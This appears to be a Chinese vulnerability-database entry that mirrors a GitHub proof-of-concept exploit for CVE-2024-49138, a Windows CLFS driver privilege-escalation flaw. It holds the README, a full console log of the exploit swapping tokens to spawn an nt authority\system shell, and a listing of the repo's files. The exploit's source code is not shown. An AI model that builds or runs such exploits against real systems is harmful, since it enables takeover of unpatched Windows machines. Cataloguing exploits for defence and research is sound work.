漏洞平台

POC详情： feb76cd61a7f3b3ca967fc64f0fa7ab915226750

来源

https://github.com/MrAle98/CVE-2024-49138-POC

关联漏洞

标题： Microsoft Windows Common Log File System Driver 安全漏洞 (CVE-2024-49138)
描述：Microsoft Windows Common Log File System Driver是美国微软（Microsoft）公司的通用日志文件系统 (CLFS) API 提供了一个高性能、通用的日志文件子系统，专用客户端应用程序可以使用该子系统并且多个客户端可以共享以优化日志访问。 Microsoft Windows Common Log File System Driver存在安全漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响：Windows Server 2008 R2 for x64-

描述

POC exploit for CVE-2024-49138

介绍

# CVE-2024-49138-POC

Proof of Concept that exploits [CVE-2024-49138](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49138) in CLFS.sys. 

CrowdStrike detected the vulnerability actively exploited by threat actors.

Tested on **Windows 11 23h2**.

A thorough analysis will be provided in a detailed blog post.

## Compile and Run

Compile x64 Release version.

Run and get a system shell.

```
PS C:\Users\IEUser\Desktop> whoami
windows11\ieuser
PS C:\Users\IEUser\Desktop> .\CVE-2024-49138-POC.exe
Directory created successfully: C:\temp
Directory created successfully: C:\temp
file opened successfully
AddLogContainer successful
hResource = 0x00007FF7CDB89080
hResource = 0x00007FF7CDB890A0
pResourceData = 0x00007FF7CDB890A0
Resource size: 65536 bytes
Resource written to output.bin successfully.
Kernel Base Address: 0xFFFFF80339800000
Kernel Name: ntoskrnl.exe
NtReadVirtualMemory = 0x00007FFFAF0EFB40
NtWriteVirtualMemory = 0x00007FFFAF0EFAA0
pcclfscontainer = 0x0000000002100000
address_to_write = 0xFFFFC201424CC2B2
Process priority set to REALTIME_PRIORITY_CLASS.
Thread priority set to the highest level: TIME_CRITICAL.
triggering vuln...CreateLogFile failed with error 6601
Process priority set to NORMAL_PRIORITY_CLASS.
Thread priority set to the highest level: THREAD_PRIORITY_NORMAL.
vuln triggered
reading base of ntoskrnl to check we have arbitrary read/write
buf = 0x0000000300905A4D
swapping tokens...
current token address = 0xFFFFC201423EC578
systemtoken = 0xFFFFD401F501C6E9
Overwriting process token..
token swapped. Restoring PreviousMode and spawning system shell...
Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.

C:\Users\IEUser\Desktop>whoami
nt authority\system

C:\Users\IEUser\Desktop>
```

![systemshell](https://github.com/user-attachments/assets/788d4096-1c9c-46a6-ad52-988e6538dd18)

文件快照


 [4.0K]  /data/pocs/feb76cd61a7f3b3ca967fc64f0fa7ab915226750
├── [ 17K]  CVE-2024-49138-POC.cpp
├── [1.4K]  CVE-2024-49138-POC.rc
├── [1.4K]  CVE-2024-49138-POC.sln
├── [7.1K]  CVE-2024-49138-POC.vcxproj
├── [1.3K]  CVE-2024-49138-POC.vcxproj.filters
├── [ 64K]  mylogdddd.blf.blf
├── [2.9K]  RCa04816
├── [1.8K]  README.md
└── [ 460]  resource.h

0 directories, 9 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。